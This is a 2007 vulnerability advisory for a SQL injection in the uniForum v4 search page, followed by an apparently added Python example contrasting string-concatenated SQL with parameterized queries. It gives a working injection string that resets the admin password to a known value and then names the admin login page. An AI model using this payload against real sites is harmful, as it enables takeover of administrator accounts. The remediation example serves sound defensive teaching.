uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability

2007-01-25T00:00:00
ID SECURITYVULNS:DOC:15860
Type securityvulns
Reporter Securityvulns
Modified 2007-01-25T00:00:00

Description


Title : uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability

Author : ajann

Contact : :(

S.Page : ...

Vendor : http://uniforum.biz/

$$ : $99


[[SQL]]---------------------------------------------------------

http://[target]/[path]//wbsearch.aspx (POST Method) [SQL]

Example:

//Find the wbsearch.aspx page first; in the "by User" field, enter ';update admin set Password='000245'--

Login Admin:http://www.xxx.com/[path]/wbadmlog.aspx Username: Administrator Password: 000245

[[/SQL]]

"""""""""""""""""""""

ajann,Turkey

...

I'm not a hacker!
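The root cause the advisory implies is a search field concatenated into SQL text. The following is an added example, not uniForum's code or the author's: it contrasts that pattern with a bound parameter, using the "by User" input quoted above. The `posts`/`admin` schema, the function names and the SQLite stand-in database are assumptions made for illustration.

```python
import sqlite3

# Input quoted from the advisory's "by User" example.
ADVISORY_INPUT = "';update admin set Password='000245'--"

def make_db():
    """Constructed stand-in schema; the real uniForum tables are not on the page."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE admin (Username TEXT, Password TEXT);
        CREATE TABLE posts (Author TEXT, Body TEXT);
        INSERT INTO admin VALUES ('Administrator', 'original-secret');
        INSERT INTO posts VALUES ('alice', 'hello'), ('bob', 'hi');
    """)
    return db

def search_concatenated(db, by_user):
    """Vulnerable pattern: the form field is pasted into the SQL text."""
    sql = "SELECT Body FROM posts WHERE Author = '" + by_user + "'"
    # executescript models a driver that accepts stacked statements,
    # which is what the advisory's input relies on (assumption).
    db.executescript(sql)
    return sql

def search_parameterized(db, by_user):
    """Hardened pattern: the field is bound as a value, never parsed as SQL."""
    cur = db.execute("SELECT Body FROM posts WHERE Author = ?", (by_user,))
    return [row[0] for row in cur.fetchall()]

def admin_password(db):
    """Read back the stored admin password to observe any side effect."""
    return db.execute("SELECT Password FROM admin").fetchone()[0]

if __name__ == "__main__":
    for search in (search_concatenated, search_parameterized):
        db = make_db()
        search(db, ADVISORY_INPUT)
        print(search.__name__, "-> admin password is now", admin_password(db))
```

With the bound parameter the quote and semicolon are compared literally against `Author`, so the search returns no rows and the `admin` table is untouched.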